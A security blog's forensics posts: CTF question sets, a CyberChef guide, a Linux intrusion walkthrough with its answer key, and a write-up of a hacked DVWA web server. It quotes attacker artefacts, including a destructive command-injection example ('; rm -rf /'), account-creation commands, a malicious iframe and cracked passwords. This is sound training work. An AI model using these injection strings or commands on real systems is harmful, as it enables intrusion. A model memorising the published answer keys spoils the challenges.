Friday, December 29, 2017

Network Forensic CTF - TufMups Undercover Operation


Disclaimer: This CTF scenario is satirical and doesn't represent anyone's opinion, about anything.


This is a network forensics CTF I set up recently for a team training event. It was well received and I think it is a bit of a laugh and challenge for a range of experience levels. I hope you enjoy it!


Background: You're an agent with a government law enforcement agency. You've been tracking a group of criminal hackers known as "TufMups". This group either keeps a low profile, your agency's capacity to run investigations on the internet is very poor, or some combination of those two factors. Up until two days ago you had an active relationship with an informant who went by the handle "K3anu". As you walked into your office you received a package containing a flash drive, a printed screenshot (at the top of this blog post) and a very short note. 

"Review this PCAP. It will all make sense. Woaaahhhh. - K3anu"

That package was the last you heard from K3anu.

DOWNLOAD EVIDENCE LINK  <-- Everything you need to answer the questions is in the PCAP. There is a server I left up which you can use to get a couple flags, but it's not intended to be hackable. It may be more fun to get the flag(s) directly from the webserver - so I'll leave it up! 


If you're approaching this new to either CTF or analyzing PCAP's I have a couple of tips:

  1. Use CyberChef and love it. I have a blogpost about it here
  2. Know and love WireShark. There are other ways to approach a PCAP challenge by replaying the cap through Bro/Suricata/VortexIDS (thx to D.K. for this tip) or summarizing with another command line tool like TShark but that isn't totally necessary.
  3. Find a tool to help crack zip files, think about both brute force and dictionary attacks as viable strategies. There might be one in Kali Linux, and on other Linux distributions it may be just an "apt install" away :D.
  4. Metadata is always useful - make sure you have a tool to check for it.
  5. Read ahead through the questions if you're getting stuck. Use the screenshot at the top of the post as a starting point. Hit me up on Twitter for hints @securitymustard or to berate me.

Questions:

What is the start time of the PCAP ("Date and Time of Day" setting in Wireshark round to nearest second)?
What is the end time of the PCAP ("Date and Time of Day" setting in Wireshark round to nearest second)?
How many total packets were sent between the host and the hacker website IP?
What is the hostname of the system the PCAP was recovered from? (all caps)
What exact version of browser did K3anu use? (exact number only)
What operating system did K3anu use? (Name and number only)
How many DNS queries in the PCAP received NXdomain responses?
What is the hidden message in the TufMups website? (decoded)
What is the key to decode the secret message in the TufMups website?
How did K3anu get access to the file? (lowercase, just protocol)
What's the nickname of the operator on the IRC channel?
What is the 1st operation needed to decode the IRC users "secure" comms? (just the format name)
What is the 2nd operation needed to decode the IRC users "secure" comms? (just the format name)
What is the 3rd operation needed to decode the IRC users "secure" comms? (just the format name)
What is the 4th and final operation needed to decode the IRC users "secure" comms? (2 words lowercase)
What is the password to decrypt the zip file that was downloaded by K3anu?
How many total rows of "fullz" are represented in the file?
How many people in the fullz are named Joshua, have a MasterCard, and use an OS X system?
From the previous question (people named Joshua) - what is the most expensive car new in this filtered list?
What IP and port does the executable connect to? ip:port
What is the MD5 of the executable?
What was used to compile the malicious executable?
What executable did K3anu likely use to download files from the remote server? (exactly as written in source material)
What is the host system's exact BIOS version?
What is the filename of the first file taken from K3anu's computer?
What is the filename of the second file taken from K3anu's computer?
What utility was used to steal the files from K3anu's computer?
What destination port was used to steal the files from K3anu's computer?
What is the password to decrypt the file stolen from K3anu's computer? (it's lowercase)
What is K3anu's real identity?
What city is K3anu likely to be in?
What is K3anu's likely status? (lowercase)
What is the address of the restaurant closest to where K3anu is likely to be? (exactly as reported by Google maps)
The hacker left a message for law enforcement on K3anu's system, what was it? (message only)


DOWNLOAD ANSWERS LINK : Don't get too hasty looking up the answers! You can always ping me on Twitter @securitymustard for hints :D.

Monday, November 13, 2017

DFIR CTF: Precision Widgets of North Dakota Intrusion


Hi all, it's time for me to create a new DFIR CTF so I'm releasing my previous one to the public. Please if you're playing this and have some fun/see some value send me feedback @securitymustard and what you'd like to see in future DFIR games.

Note that some of the infrastructure for this (OSINT component, company website, etc) are no longer hosted. This doesn't make the game unplayable it was mostly just eye-candy. There is also a Twitter account you can get access to in the course of this, It's not a big deal if it were ransacked (if it hasn't been already) but please respect others and don't ruin the game.

Background:
Precision Widgets of North Dakota is a manufacturer of high tech precision aircraft and mobility parts primarily for government customers across the globe. PWND owns patents for several processes and designs which are the foundation of their brand and their most precious asset.

PWND was recently outbid on a contract to manufacture 150,000 Rascal scooter performance exhaust systems for the local government of Fort Lauderdale Florida. Due to PWND's previous success in this area and substantial cost advantages in the market PWND's CEO and founder Billy Honeydew immediately suspects foul play.

You are an incident response consultant from Johnson and Johnson and Johnson LLP tasked with discovering if there was data stolen from the PWND network, and if so how.

Evidence Downloads: 
Note: Decrypt password is "nolycasissor" (Ross is a Cylon backwards.. don't ask?)



Questions (recommended points, KC phase, question):

  1. 25 Recon What is the internal IP address of PWND-CEO? 
  2. 25 Recon What is the internal IP address of PWND-ITADMIN? 
  3. 25 Recon What is the internal IP address of PWNDDC01? 
  4. 25 Recon What is the full name of the domain? 
  5. 25 Recon What is Billy Honeydew's Twitter handle (no @)? 
  6. 25 Recon What is the Twitter handle of the individual he talks to (no @)? 
  7. 25 Recon What is the full link to the malware (unshortened)? 
  8. 50 Delivery What is the time in UTC (MM/DD/YYYY HH:MM) of the initial malware delivery? 
  9. 50 Delivery What is the time in UTC (MM/DD/YYYY HH:MM) of the payload download on PWND-CEO? 
  10. 75 Weaponization What type of payload is the malware (exactly as you'd see it in the builder)? 
  11. 25 C2 What is the IP of the C2 server? 
  12. 25 C2 What destination port is being used by the malware (format port/protocol)? 
  13. 50 C2 What is the time in UTC (MM/DD/YYYY HH:MM) of the first connection of pwnd-ceo to the C2? 
  14. 50 C2 What is the time in UTC (MM/DD/YYYY HH:MM) of the first connection of pwnd-itadmin to the C2? 
  15. 50 C2 What is the time in UTC (MM/DD/YYYY HH:MM) of the first connection of pwnddc01 to the C2? 
  16. 50 Installation What PID is the malware running under on PWND-CEO? 
  17. 50 C2 How many packets were transferred between PWND-CEO and the C2 IP? 
  18. 50 Actions on Objectives How much data (round to nearest MB) was transferred from the system that data was exfiltrated from? 
  19. 25 Installation What data stream of the payload on disk indicates where it came from? 
  20. 50 Actions on Objectives What is the filename of the staging tool used? 
  21. 50 Actions on Objectives What is the true application name of the staging tool? 
  22. 75 Actions on Objectives What is the mistaken name the attacker named the staging tool before changing it?
  23. 75 Actions on OBjectives What command had resulted in the domain admin credential being stored in memory? 
  24. 50 Actions on Objectives What is the password for the bhoneydew domain account? 
  25. 50 Actions on Objectives What is the password for the pwnddc01 domain account? 
  26. 50 Actions on Objectives What is the password for the cmaldonado domain account? 
  27. 25 Actions on Objectives What protocol was used to transfer payloads laterally (1 guess)? 
  28. 25 Actions on Objectives What is the filename used as a payload in lateral movement? 
  29. 50 Actions on Objectives What time was the payload transferred to 192.168.64.137?
  30. 50 Actions on Objectives What time was the payload transferred to 192.168.64.149? 
  31. 50 Actions on Objectives What protocol was used to execute payloads remotely? 
  32. 100 Installation In the decoded payload instructions that would be run on a x86 system, what is the exact path defined in "DownloadData"? 
  33. 100 Actions on Objectives Try to login to the malicious user's twitter account - what is the password (2 guesses)? Note: Do not tweet, delete tweets, delete the account, or otherwise ruin the challenge for others.  
  34. 150 Actions on Objectives Who is the bad guy in this case (1 try)? 
  35. 25 Recon What is the active time bias running on PWNDITADMIN? 
  36. 25 Installation What is the name of the process on PWNDITADMIN that has executable injected code? What is the 2 byte hex string that indicates this to you? Answer in form processname,hexbytes    
  37. 50 Installation What is the size in bytes of the file uploaded by the hacker to PWNDITADMIN? Based upon the differences in the created, modified and accessed times what file operation do you theorize was used to put it there? Format: size,operation    
  38. 50 Actions on Objectives What is the total number of files inside the exfiltration archive?
  39. 50 Actions on Objectives What is the most concerning folder name that was exfiltrated? 



Saturday, June 10, 2017

CyberChef: Example DFIR Use Cases

GCHQ released CyberChef late last year which is an excellent tool for data manipulation and analysis. My perception was that this was primarily observed by the hacker and CTF community as a new must have tool for solving puzzles, but I didn't see many DFIR analysts commenting that this is now an important part of their toolbox.

The tool intends to be a Swiss army knife for encryption, compression, encoding, and string manipulation functionality for hackers and tinkerers. The majority of the time I use this tool it's out of convenience to convert Hex, Base64, or decompress data. Outside of standard conversions this tool has provided me value due to the large number of options, flexible pipeline which promotes experimental discovery, and simple interface for reviewing output.

This tool is free, lightweight, and can be easily hosted locally and shared by all analysts working a case. It's been a huge benefit to my team at work as we've analyzed cases with obfuscated Powershell commands and encryption in use.

Link to demo and download:
https://github.com/gchq/CyberChef

I'll lead with a fairly real world example of where this is useful. The following screenshot if from a Veil Evasion Powershell Meterpreter payload I just created. This is a reverse shell that utilizes an encoded and compressed Powershell command. If all you had was the payload, the way to derive useful information from it may not be clear as you need to decode and decompress the payload inline. Cyberchef makes decoding this command from Base64 and decompressing simple. It's easy to see the IP (100.100.100.100), User agent (Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)), and port (1337) to be used by the payload using this tool.


Timezone and format conversion: It's common to work cases as a team including evidence in multiple timezones. I also believe it's common to have mistakes made with incorrect mental math converting timezones. This feature is convenient for consistent conversion of format and timezone.

Exif Extract: ExifTool is probably the most common standalone tool used by DFIR analysts to extract metadata from images but that is a standalone command line tool. If you're only concerned with Exif from a small number of files this may be a convenient option. The "Other->Extract Exif" option will pull exif data from JPEG, TIFF and audio files.

Encryption/Decryption: There are plenty of simple encrypted artifacts that we've come to expect our tools to automatically decrypt for us. It's fairly common to encounted encrypted commands, network artifacts and files during intrusion cases so this can be a very vital feature. See below the simplest example - Rot13 on a UserAssist key.

IP format conversion: Occasionally I see an analyst get tripped up by IP's in decimal format (to be fair - that was me at one point too). Have no fear.

IP subnet tasks: Occasionally I find tools that don't take a subnet and require a list of IP addresses. This feature easily prints a list of IP's from a subnet for masks 32 (lol) down to 16. Obviously this is easy to do otherwise for a /24 (bashy code: "for i in {1..255}; do echo 10.0.0.$i;done") but gets trickier to script with oddball masks. Additionally this "Networking" section works as a subnet calculator, can group a list of IP's into subnets, handle URL encoding.. Very multipurpose!

Code Beautification: This is a pretty common DFIR struggle, coming across Javascript or other code that is in one continuous block and trying to make sense of it. Many times a debugger or console is the correct answer, but sometimes just "beautifying" the code helps you find answers.

Utils tab: The "Utils" tab is useful for string manipulation. In the below example we're counting how many times the character "4" appears in a string. There's also options to diff, toUpper, toLower, reverse, sort, unique, remove whitespace, find/replace and many more! This is all great functionality that generally can be done from a CLI but sometimes this is the most convenient means.

Extract dates: This can be useful in certain types of evidence that isn't in a standard log format. For an example I used a snippet from a setupapi.log (plug and play log, generally used to show the first and last times a specific USB was connected). Chef also has a variety of other prebuilt regex extractors that could speed up your analysis including IP's, Email, URL's, File Paths, and more. You can also create your own regex based extractor so the sky is the limit.

Check Entropy: This could be useful if you're trying to make a point about a simple password, identify encrypted material, and potentially other uses I haven't come across. You might pick up that I don't use this often, but I think it's pretty cool that it's in the tool.

TL:DR - If you haven't yet, try CyberChef, the list of capabilities will likely impress you.

Wednesday, March 22, 2017

Walkthrough: Forensic CTF - Bob's Chili Burgers Website Hacked

I'm really pumped that I had two requests to walk through this forensic CTF I made last year. I created this one for a ~4hr CTF event in a SOC and it was well received. Many SOC analysts have done Windows compromise cases but are still waiting for that fateful day when the China SSH bots finally guess a root password ("Letmein!12", unguessable!) on the one Linux server exposed to the internet without certificate authentication. This is an introductory Linux forensics case and I hope you had/have some fun with it. 😊

We'll address each question in order using the SIFT workstation VM.

Mounting the Image on SIFT or Kali:
  1. Place the image in your /cases directory
  2. sudo su   # become root
  3. ewfmount /cases/BobsFamousChiliCase_Logical.E01 /mnt/ewf_mount1/ # Mount the E01 as a RAW in /mnt/ewf_mount1/
  4. mount -t ext4 -o ro,loop,noexec,noload /mnt/ewf_mount1/ewf1 /mnt/e01 # Mount the RAW in /mnt/e01, use "noload" option to fix filesystem


Questions:

1. Verify SHA1 Checksum of the image provided:
This is easily done in most Linux distributions out of the box with the "sha1sum" tool. You could also do this on your Mac terminal easily using "shasum", or on Windows Powershell using "Get-FileHash -Algorithm SHA1 C:\path\to\file.ext".


Answer: c67d36f2a8851fdf9bb3de9fd0441b619e40c070

2. Through what protocol was this system compromised? 
Despite this ambiguity this is pretty easy to figure out. With Linux intrusion cases I start in "/var/log" (where most logs are stored by default).

A directory listing of the /var/log on this system shows that the logs are very small in size, indicating this system is likely lightly used. This should make it easier to identify malicious activity because we don't have to sift through gigabytes of old log data.


Auth.log is a logical first log to review as it contains all the authentication logs including SSHD and user group changes. A quick word count by lines shows this is a very short log and something we can review line by line in a minute.


A quick grep for "Accepted" and "Failed" logins (command grep -E "Failed|Accepted" auth.log - Breakdown: -E is extended regex which allows us to amongst other things provide multiple pipe delimited patterns) shows us what we need. There are a series of RFC1918/local logins followed by internet based failed logins, and finally a root login from 5.101.65.141 at 20:03:45.


The answer to this question is simply "SSH".

3. What distribution and version is this system?
Two of the most common initial Linux enumeration commands are "cat /etc/issue" and "uname -a" which generally pull back the distribution version, kernel version, hostname, architecture, etc. The "uname" command calls back to a binary on disk, but /etc/issue is a file on disk we can easily read from the image.


Answer: Ubuntu 14.04.4 LTS

4. What country is the attacker's IP address from? 

In question 2 we identified 5.101.65.141 as the attacking IP address. There are tons of online resources we could use to identify the country this IP is assigned to (robtex, domaintools, etc) but pretty much all of these will use whois on the backend. Quickest way is to simply "whois 5.101.65.141".


Answer: It's always Russia, am I doing this right? 😐

5. What time was the attacker account created in UTC (XX:XX:XX format)?

This is another one we can find easily in the auth.log. User "radvlad" was created on "Jun 1 20:11:03"


Answer: Jun 1 20:11:03

6. What port is the protocol used to compromise the system set on?

SSH stores it's configuration in /etc/ssh/sshd_config. Let's search that file for port (note: the -i after Grep makes the pattern case insensitive, usually a good idea when you know a keyword but not the case).


Answer: 422

7. How many different countries are represented by the IP's in the web server log?

Ok here's the first one where we get to have a little command line fun. Apache2 is installed which stores its logs in /var/log/apache2. The "accesss.log" is clearly the one that is being asked about as it shows who visited and made requests on the web server. We'll need to use some coreutils to quickly find this answer:

First thing I'd do is look at a "tail" of the log to see the format:

Boom, very first item is the IP address. Lets see how many unique IP's there are using the cut command to show us only the text that appears before the first space (cut -d" " -f1), sort to put the resulting IP's in order, then uniq to show us only unique IP's in that list:


We can disregard the ::1 and the RFC1918 address, so that leaves us 7 unique IP's. Originally when I created this challenge I did something cool like the below:


But as you can see I got some "connection refused" items and I'm generally not confident with the result. Sometimes we have to follow the "KISS" model and just use a known quantity like MXToolbox ( https://mxtoolbox.com/BulkLookup.aspx ).


Answer: 6

8. What date and time (directly copy/paste from log) did the attacker first log in?

Another one we've already answered via auth.log.


Answer: Jun 1 20:03:45

9. What is the IP that failed to log in directly before the attacker successfully logged in? 

Another simple auth.log request. Now this one I could see someone contesting as the "attacker IP" technically failed to login directly before they succeeded in guessing the password. I was looking for the other IP that tried to login right before.


Answer: 107.150.94.4

10. What day of the week does the attacker's cron job fire?

User cron files are located in "/var/spool/cron/crontabs". In this folder we see one file "root".  In this text file we see just one cron job defined:


Aha! The jerk set a cron job to use netcat to send a reverse shell to his IP address on a recurring basis. Quick review of the cron format (image credit: https://en.wikipedia.org/wiki/Cron) shows that the command is set to run the 30th minute, on the 17th hour, on any day of any month, but only on Mondays.


Answer: Monday



11. What is the name of the user account the attacker made?

Another we already answered: radvlad


Answer: radvlad

12. The attacker set a password for the account that they made, what is it set to?

Woot, we get to use our basic attacker toolkit now to crack some passwords for #12-13. John the ripper is the classic choice for cracking the shadow file from a Linux box and would be my choice. 

You can quite simply run "john ./etc/shadow" from the root of the mounted image to start cracking passwords on the box. These passwords are thankfully quite simple and can be cracked with the default profile in John, however if you want to crack them FAST (like if you were in a CTF) use a wordlist such as RockYou.txt as a starting point. Note that most real CTF's ensure passwords aren't in RockYou, CrackStation, etc to make it more difficult and require some thought on your part.

I first ran john with the default profile and it quickly found the "radvlad" password but was hanging on the others (we're only asked to get the root and radvlad passwords, not necessarily bob). I decided to download rockyou.txt and see if that worked.



Answer: 1qaz2wsx

13. The attacker changed the root password, what is it set to?

See the screenshots for #12.

Answer: asdzxc

14. What addition to the website is causing users to get redirected to malicious pages?

We've already learned a lot about this system that helps us start this question. We know the server is running Apache2, so we can expect to see the webroot in /var/www by default. We know the times the attacker was logged in, and we know he was logged in as root. 

Couple of different paths to follow to fully answer this one:

Root command line history: Lets verify if there are any hints in the .bash_history for the root user.


Well this is quite obvious, the attacker used echo to append an iframe to a weird looking link to the index.html file. He also appreciated the 1337 password that was set for the root password and saw fit to taunt the administrators, what a scalawag! 

Let's verify this by doing a tail on the index.html file in /var/www/html.


Answer: <iframe src="http://anecdote.roobaroo.org/xegblh2.html"></iframe>

15. What exploit kit is the link associated with?

This question is actually a little harder than it was when the challenge was fresh. At the time the challenge was made this was an actively tracked EK link in sites like Malware Domain List. Even still, a quick Google search for the full URL will get you the answer.



Answer: Angler

16. What is the sha256 hash of the first file the attacker added to /var/www/html?

There are a couple of .exe files in the /var/www/html. The question here is which was added first? The default behavior of the "ls" command will show you the last modified time of the file. This isn't that useful in this case because one of the files was last modified back in April. The last modified time wasn't updated when the files were moved here. To overcome this lets take a look at the output of the "stat" command for both files, then do a sha256sum for both files.


We can see the "setup.exe" has an access and metadata change time of 00:21:39 which is earlier than the 00:21:58/00:22:13 of the setup_20001.exe file.

Answer: 94ebd2af4d1e1e4d01c4806cf1d94c44d24014da0703424f864e5e8cd3396fb9  setup.exe

17. What is the ClamAV name for the second file the attacker added to /var/www/html?

This is as simple as doing a Virustotal.com search for the hash of the setup_20001.exe file. Alternately you could install ClamAV and run it against the file, but there's no guarantee that would still be accurate so long after this challenge was created.


Answer: Win.Trojan.691128-1

18. What file was exfiltrated? && 19. What command line tool did the attacker use to exfiltrate the file?

We saw that the attacker apparently didn't clean up the .bash_history for the root user, so lets head back there.


Woot, there's the answer to both 18 and 19. The user uploaded the "Secret-Recipe-Chili" to Pastebin.com using the "pastebinit" tool.

Answer 18: Secret-Recipe-Chili
Answer 19: Pastebinit

20. BONUS: URL for the exfiltrated file?

I honestly don't think this one is possible to answer anymore. I can't find the paste. It must have been cycled out for more interesting pastes :-).

That's it! Hope this helps someone. Please leave me feedback if you have better ways to work the case, ideas for new comedy themed DFIR practice material, or any questions.



Sunday, March 19, 2017

Answers: Forensic CTF - Bob's Chili Burgers Website Hacked

Emma V writes:
Hey, will you post the answers ?

Answer: Yes! Sorry I hadn't posted them previously. Glad you worked the case, hope you had fun. Let me know if there's any interest on a walkthrough for this one, I'd be happy to put one together.

  1. Verify SHA1 Checksum of the image provided: c67d36f2a8851fdf9bb3de9fd0441b619e40c070
  2. Through what protocol was this system compromised? SSH
  3. What distribution and version is this system? Ubuntu 14.04.4 LTS
  4. What country is the attacker's IP address from? Russia
  5. What time was the attacker account created in UTC (XX:XX:XX format)? Jun 1 20:11:03
  6. What port is the protocol used to compromise the system set on? 422
  7. How many different countries are represented by the IP's in the web server log? 6
  8. What date and time (directly copy/paste from log) did the attacker first log in? Jun 1 20:03:45
  9. What is the IP that failed to log in directly before the attacker successfully logged in? 107.150.94.4
  10. What day of the week does the attacker's cron job fire? Monday
  11. What is the name of the user account the attacker made? radvlad
  12. The attacker set a password for the account that they made, what is it set to? 1qaz2wsx
  13. The attacker changed the root password, what is it set to? asdzxc
  14. What addition to the website is causing users to get redirected to malicious pages? <iframe src="http://anecdote.roobaroo.org/xegblh2.html"></iframe>
  15. What exploit kit is the link associated with? Angler
  16. What is the sha256 hash of the first file the attacker added to /var/www/html? 94ebd2af4d1e1e4d01c4806cf1d94c44d24014da0703424f864e5e8cd3396fb9
  17. What is the ClamAV name for the second file the attacker added to /var/www/html? Win.Trojan.691128-1
  18. What file was exfiltrated? Secret-Recipe-Chili
  19. What command line tool did the attacker use to exfiltrate the file? pastebinit

Saturday, March 18, 2017

Ashemery.com: Challenge #1 - Web Server Case Write-up

I found this awesome collection of DFIR training scenarios on dfir.training (thanks to @DFIR_tools and Ali Hadi, Ph.D.): http://www.ashemery.com/dfir.html

Link to disk image.
Link to memory image.
Hashes.
Password for disk image.

Here's my write-up for Ali Hadi's "Web Server Case". This is a simple case but enjoyable because you can correlate disk artifacts and memory to build the picture of attacker activity. I'll write this up as I go so that anyone could follow along (note: this is more of a walkthrough than a report).

Ali provided 7 main questions to guide analysis:
  1. What type of attacks have been performed on the box?
  2. How many users has the attacker(s) added to the box, and how were they added?
  3. What leftovers (files, tools, info, etc) did the attacker(s) leave behind? (assume our team arrived in time and the attacker(s) couldn’t clean and cover their tracks)
  4. What software has been installed on the box, and were they installed by the attacker(s) or not?
  5. Using memory forensics, can you identify the type of shellcode used?
  6. What is the timeline analysis for all events that happened on the box?
  7. What is your hypothesis for the case, and what is your approach in solving it?

Gather System Information:
My first step was to get some contextual information on the system. I mounted the image using FTK imager (make sure to always mount as "Filesystem / Read-only" to ensure your tools work as intended) and extracted the desired registry hives (system, software, sam, ntuser.dat, usrclass.dat).

I used Eric Z's Registry Explorer and Harlan C's RegRipper to get two different views of the System and Software hives. I often use both of these tools to verify against each other. I also prefer Explorer for less structured analysis, and RegRipper for getting all the common answers I need on every case (Reg Explorer does this too with Bookmarks, but I like some of the auto-conversions in RegRipper and it's just a tool I'm comfortable with honestly).

Computer Name: WIN-L0ZZQ76PMUF

Time Zone: PDT (ActiveTimeBias is -7UTC)

OS Version: Windows Server 2008 Standard (from Software hive)


Users: Administrator [500], user1 [1005], hacker [1006] (lol, used RegRipper SAM profile)

Since this is a pretty obvious practice scenario created for a college course, the instructor gives us easily spotted pivot points. The "Account Created" times for the "user1" and "hacker" accounts are the first critical items we can add to our timeline and pivot from.

Get Organized:
It always pays dividends when I take a few minutes to group my analytic questions to answer, write down what artifacts I expect to need to answer each question, and also write down any unknowns that I don't currently have a plan for but need to be answered.

In this case we don't have much context other than: This is a web server. It has been hacked via a web service. The attacker has added some accounts. Other than these clues we have to figure it out ourselves, which puts extra emphasis on vetting out legitimate vs attacker activity.
  • What types of attacks have been performed on the box? Expected to use web server logs, file system timeline, memory analysis (especially if web logs lack parameters which we can potentially fill in with memory).
  • How many users did the attacker add? (hypothesis == 2 based upon SAM) and how were they added? To figure out how they were added we'll need to find the actual commands run, this might be in the web logs depending on the vulnerability exploited or in memory.
  • What leftovers (files, tools, info, etc) did the attacker(s) leave behind? This sounds like a filesystem timeline ($MFT, $LogFile, $UsnJrnl:$J) task if I've ever heard one. 
The first necessary step in answering this question is determining the web server software installed. In this case XAMPP is installed. Finding the version of the web server software running is pretty simple, here are a few ways:

  • Via Disk: right in the root of the drive you see a XAMPP folder suggesting the Windows LAMP stack is installed.
  • Via Memory:

Netscan shows httpd.exe (Apache) is running and listening on 80/443.

PS C:\Users\aswood\Desktop\tools\Forensics\Memory Forensics\volatility_2.6_win64_standalone> .\volatility_2.6_win64_standalone.exe -f C:\Users\aswood\Desk
top\Cases\Challenge1_WebServerCase\memdump\memdump.mem --profile=Win2008SP2x86 netscan

Pslist (or psscan/psxview) shows that Mysqld.exe, httpd.exe, and xampp-control.exe are running.

PS C:\Users\aswood\Desktop\tools\Forensics\Memory Forensics\volatility_2.6_win64_standalone> .\volatility_2.6_win64_standalone.exe -f C:\Users\aswood\Desk
top\Cases\Challenge1_WebServerCase\memdump\memdump.mem --profile=Win2008SP2x86 pslist

XAMPP is a prepackaged LAMP stack which has packages for Windows, Linux and OSX. It's really focused on ease of use and setup, which often leads to default and insecure configurations being used in production. We still have the image mounted as E:\ drive so viewing the logs is as simple as accessing "E:\[root]\xampp\apache\logs".
As with any Apache install, the access.log is the key artifact that will show us what requests were made to the server. In this case it's really simple to start finding answers to our questions using the time period of the account creation (Sept 2 2015 ~0900 UTC) and the account names (hacker, user1) as a pivot point.

A simple search through the access.log for the minute of the account creation has interesting results:

We see a series of POST's to "/dvwa/vulnerabilities/exec" with a 200 response. DVWA is "Damn Vulnerable Web App" a common teaching tool for basic web application pen-testing (fun if you've never worked through it, highly recommended as well as most things on VulnHub). Here's what the "vulnerabilities/exec/" page looks like in DVWA:


Essentially it's an insecure web front-end for the ping command. The page doesn't perform any input validation, allowing anyone to end the ping command and run another command. Example: "192.168.0.1; rm -rf /" ("ouch" says linux server running apache2 as root!)


Creating Filesystem Timeline:

There are many tools that can create a functional filesystem timeline. Here are some options:
  • Absolute Fastest/Laziest MFT based: FTK Imager can create a "Directory Listing" which contains MAC times (right click in evidence tree, select "Export Directory Listing".
  • Sleuthkit FLS & Mactime can be used to create a filesystem timeline in NTFS.
  • Log2timeline/Plaso can be used to create a filesystem timeline.
  • A simple MFT parsing tool like RedWolf MFT_Parser or AnalyzeMFT.py
I opted for something a little overkill and cool by using David Cowen's Triforce (ANJP 3.11.07 free edition) tool. It doesn't hurt that Zelda just came out. This tool accepts not just the $MFT but also the $J and $LogFile, putting pretty much all the filesystem metadata available on disk in your hands to interpret. Parse these files using ANJP, connect to the database, and finally export any filtered views you need to review to text or XLSX.

What are the first two "Deleted" records reported from the USN Journal? How about two artifacts of php shells dropped via SQL injection? #mastersword


Creating Volatility Compatible Memory Strings file:

You can simple run strings against a memory dump and use command line tools to find items of interest. This is the oldest form of memory forensics and is still very useful. Volatility takes that technique to another level by telling you what processes space the string appears in! This can actually be done in (at least) two different ways. One simple way I've used many times is with the Volatility "yarascan" module. By using the --yara-rules "mystring" you can search for one string (or a YARA rule full of strings with the --yara-file switch) and find what process it resides within.

To do this at scale - you can use the Volatility strings module which requires an input file of the strings preceded with their decimal offset within the memory dump. Strings.exe from Sysinternals can produce this output with a command similar to the below:


After this is created you can run this output file through Volatility with the "strings" module to produce another file with the process mapping for every string! This is a technique I don't generally use, so I was excited to put it to work after reading about it in the crucial tome "Art of Memory Forensics" (highly recommended if you don't own it - enjoy it over the course of several months IMO :-) ).

Attack: Command Injection
This leads us to the first attack against this box - command injection. Looking at our access.log for the POST's to "dvwa/vulnerabilities/exec/" shows that we do not have the parameters supplied to the web server. As far as I know - there isn't an on-disk artifact in this case which shows the commands run to create the accounts so we need to pivot to memory.

Using Volatility (I'm using 2.6 standalone Windows version from here) the first commands that come to mind are "consoles" and "cmdscan". Essentially consoles is the newer plugin and will show us both the command and result.

PS C:\Users\aswood\Desktop\tools\Forensics\Memory Forensics\volatility_2.6_win64_standalone> .\volatility_2.6_win64_standalone.exe -f C:\Users\aswood\Desk
top\Cases\Challenge1_WebServerCase\memdump\memdump.mem --profile=Win2008SP2x86 consoles
The "consoles" module shows us the commands run to create the "user1" account, add it to the "Remote Desktop Users" local group, and enable RDP in the Windows firewall. Note that at this time we don't have confirmation that the "user1" account was added via the DVWA command execution vulnerability, it's simply a hypothesis.

Well that's great - but what about the "hacker" account? It's not in the consoles display like the creation of "user1". We know the command execution vulnerability is being served up by the HTTPD.exe process, so lets dump the memory space from that process (or processes) and string search them.

To do this I used the "memdump" module in Volatility as below to dump the process space of the two httpd.exe processes to my Artifacts directory.


After you've dumped the process space, you can simply string search the files. I created text files of all strings with the Sysinternals strings program. After you've created your lists of strings you can simply search them using Select-String or Grep.


Alright! At the bottom we see the "net user hacker hacker /add" and "net localgroup "Remote Desktop Users" hacker /add" commands. Take note of the %26%26 before the commands - this shows that the attacker was submitting a ping request through the DVWA web app for 192.168.56.102 (his own IP) then typing && (%26%26 in URI encoding) to break out of the ping command and run additional commands. Interestingly we do not have the same results for the "user1" account which was added just 19 seconds before the "hacker" account. This leads me to hypothesize that these two accounts were added in different ways.

That last discovery gives us another pivot (queue Zelda sound)! "%26%26 (&&) can serve as a relatively unique pattern representing commands run via the DVWA command injection vulnerability. 

Using this pivot we do see some additional recon activity (directory listings of the "Windows" and "Users\Administrator" directories) but not much else. It definitely appears this exploitation was primarily used as an example and to create the "hacker" account.

Attack: SQL Injection

Using the access.log we can observe the SQLmap SQL injection ("SQLi") tool default user agent string and fairly obvious SQLi behavior starting at 11:15:40. Because these attacks were run against the "/dvwa/vulnerabilities/sqli page it did not take long for the SQLi attack to gain a shell.

SQLmap writing a simple shell to disk:

At 11:25:53 two files are dropped on the box "tmpbiwuc.php" and "tmpukudk.php". Within the same second we see a GET request for "tmpbiwuc.php" intended to run the command "echo command execution test". At 11:26:23 the "tmpukudk.php" file was deleted by a command issued by through the SQLmap created shell.

On 9/3/15 @ 6:52:24 another SQLi attack succeeds and new PHP shells are dropped "tmpudvfh.php" and "tmpbrjvl.php". Once again the initial file "tmpudvfh.php" is deleted via a subsequent command. I have been on the serving end of SQLmap many times in the past, but relatively few times on the receiving end of an attacker getting a command shell directly through SQLmap. I hypothesize this is normal behavior for SQLmap to create an initial dropper, create a more full featured shell, then delete the dropper, but I haven't verified this.


Attack: Local File Inclusion

There are obvious indicators of local file inclusion in the access.log. The attacker appears to utilize a LFI vulnerability in "/dvwa/vulnerabilities/fi/" to read multiple sensitive files on disk and to read files which the attacker themselves wrote to disk via other methods. Reading an attacker written local file is the bridge between a RFI ("Remote File Inclusion") and LFI, and usually allows command execution. 

1. Attacker uses LFI to read the Windows hosts file.
2. Attacker uses LFI to read "data.txt" which contains "Hello". Appears to be a test file.
3. Attacker uses LFI to read PHPmyadmin configuration.
4. Attacker uses LFI to read abc.txt an attacker created file with potential code execution.

Attacker Tools: Webshells

On 9/3/2015 at 7:14:48 a file "webshells.zip" is created in the "DVWA" folder. This archive contains the infamous C99 webshell, as well as a very basic PHP shell that simply accepts a shell command as a parameter.

The basic "phpshell.php" (and "phpshell2.php" duplicate) were used several times notably to create the "abc" folder:

Times that commands were submitted via the C99 shell (found using access.log):

Timeline:
Time (UTC)EventSourceNotes
9/2/2015 7:10:41First web requests from 192.168.56.102 with useragent suggesting potential Kali Linux / IceWeasel browseraccess.logFast requests - potential spidering or directory brute force (dirb?) "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.0" (I don't think many people install Iceweasel, it's installed in Kali so that's probably what was used.)
9/2/2015 8:34:27192.168.56.102 switches to UA "Mozilla/4.0 (compatible; MSIE 6.0;)" suggesting potential change in tool usedaccess.log
9/2/2015 8:35:47192.168.56.102 switches to UA ""Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"" suggesting potential change in tool usedaccess.log
